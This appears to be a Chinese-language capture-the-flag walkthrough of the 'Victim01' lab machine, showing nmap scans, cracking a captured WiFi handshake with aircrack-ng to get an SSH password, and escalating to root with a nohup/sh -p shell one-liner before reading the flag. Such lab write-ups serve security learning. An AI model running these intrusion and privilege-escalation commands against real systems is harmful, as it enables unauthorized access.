当前位置：首页 > news >正文

Victim01_042220

news 2026/3/27 7:40:43

照常探测

主机发现                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:35 EST
Nmap scan report for 192.168.56.1
Host is up (0.035s latency).
MAC Address: 0A:00:27:00:00:3C (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0031s latency).
MAC Address: 08:00:27:AD:92:33 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00036s latency).
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.43 seconds
试探端口
┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.102 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:35 EST
Nmap scan report for 192.168.56.102
Host is up (0.0022s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
8999/tcp open  bctp
9000/tcp open  cslistener
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 13.74 seconds
tcp扫描
┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo nmap -sT -sV -sC -O -p22,80,8080,8999,9000 192.168.56.102 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:36 EST
Nmap scan report for 192.168.56.102
Host is up (0.00074s latency).PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
|   256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
|_  256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open  http    BusyBox httpd 1.13
|_http-title: 404 Not Found
8999/tcp open  http    WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: 0.0.0.0:8999/
9000/tcp open  http    PHP cli server 5.5 or later (PHP 7.2.30-1)
|_http-title: Uncaught Exception: MissingDatabaseExtensionException
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (93%), Synology DiskStation Manager 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 4.15 - 5.8 (93%), Linux 5.0 - 5.4 (93%), Linux 5.0 - 5.5 (92%), Linux 5.4 (87%), Linux 2.6.32 (87%), Linux 3.10 (87%), Linux 3.10 - 4.11 (87%), Linux 3.2 - 4.9 (87%), Linux 3.4 - 3.10 (87%), Linux 5.1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.28 seconds
udp扫描
┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo nmap -sU --top-ports 20 192.168.56.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:38 ESTNmap scan report for 192.168.56.102
Host is up (0.00049s latency).PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 2.03 seconds
脚本扫描
┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo nmap --script=vuln -p22,80,8080,8999,9000 192.168.56.102 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 08:39 EST
Nmap scan report for 192.168.56.102
Host is up (0.00049s latency).PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
8080/tcp open  http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
8999/tcp open  bctp
9000/tcp open  cslistener
MAC Address: 08:00:27:E0:21:73 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 99.21 seconds

先看看80端口

感觉没啥

8080呢？

┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo gobuster dir -u http://192.168.56.103:8080/ -x txt,php,rar,zip,tar,sql -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.103:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              tar,sql,txt,php,rar,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================Error: error on running gobuster: unable to connect to http://192.168.56.103:8080/: Get "http://192.168.56.103:8080/": dial tcp 192.168.56.103:8080: connect: no route to host
没有东西

试试8999？

太多了。

？怎么有个cap包

打开看看

发现一个用户名

到这里就不会了

网上查阅了一番资料

使用使用工具 aircrack-ng进行WIFI破解得到密码 p4ssword

[[aircrack-ng进行WIFI破解]]

┌──(kali㉿kali)-[~/redteamnotes/victim01]
└─$ sudo ssh dlink@192.168.56.102                  
dlink@192.168.56.102's password: 
Last login: Tue Apr  7 23:36:49 2020 from 192.168.86.99
dlink@victim01:~$ ls
dlink@victim01:~$ sudo -l
User dlink may run the following commands on localhost:(ALL) NOPASSWD: /usr/bin/TryHarder!
dlink@victim01:~$ ^C
dlink@victim01:~$ sudo root -u /usr/bin/TryHarder!
[sudo] password for dlink: 
sudo: root: command not found
dlink@victim01:~$ sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
[sudo] password for dlink: 
Sorry, user dlink is not allowed to execute '/usr/bin/nohup /bin/sh -c sh </dev/pts/0 >/dev/pts/0 2>/dev/pts/0' as root on localhost.localdomain.
dlink@victim01:~$ sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
[sudo] password for dlink: 
Sorry, user dlink is not allowed to execute '/usr/bin/nohup /bin/sh -c sh </dev/pts/0 >/dev/pts/0 2>/dev/pts/0' as root on localhost.localdomain.
dlink@victim01:~$ nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
nohup: ignoring input and appending output to 'nohup.out'
# whoami
root
# ls
nohup.out
# cd /root
# ls
flag.txt  snap
# ls -liah
total 68K
131076 drwx------  7 root root 4.0K Apr  7  2020 .2 drwxr-xr-x 23 root root 4.0K Apr  7  2020 ..
152360 lrwxrwxrwx  1 root root    9 Aug  2  2019 .bash_history -> /dev/null
131090 -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
264335 drwx------  2 root root 4.0K Apr  7  2020 .cache
406739 drwx------  3 root root 4.0K Aug  2  2019 .gnupg
152515 -rw-------  1 root root   49 Apr  7  2020 .lesshst
264119 drwxr-xr-x  3 root root 4.0K Apr  7  2020 .local
152482 -rw-------  1 root root    0 Apr  7  2020 .mysql_history
131091 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
153732 -rw-------  1 root root    7 Apr  7  2020 .python_history
134777 -rw-r--r--  1 root root   66 Apr  7  2020 .selected_editor
281027 drwx------  2 root root 4.0K Apr  7  2020 .ssh
135782 -rw-------  1 root root 8.1K Aug  3  2019 .viminfo
132830 -rw-r--r--  1 root root  207 Apr  7  2020 .wget-hsts
153740 -rw-r--r--  1 root root  556 Apr  7  2020 flag.txt
289258 drwxr-xr-x  3 root root 4.0K Apr  7  2020 snap
# cat fl
cat: fl: No such file or directory
# cat flag.txt
Nice work!.:##:::..:::::/;;\:.()::::::@::/;;#;|:.::::##::::|;;##;|::':::::::::\;;;/::'':::::::::::|O|O|O|O|O|O:#:::::::##::..:###:::::#:::::.:::##:::::::::::#:.::::;:::::::::###::.':::;::###::;::#:::::::::;::#::;:::::::::::##:;::::::;::::###:::     ..:::::; .:::##::::::::::::::::::::::; :::::::::::::::::##::  #rootdance
# cat snap
cat: snap: Is a directory
# cd snap
# ls
microk8s
# cd microk8s
# ls
1320  common  current
# ls
1320  common  current
#

查看全文

http://www.jsqmd.com/news/338625/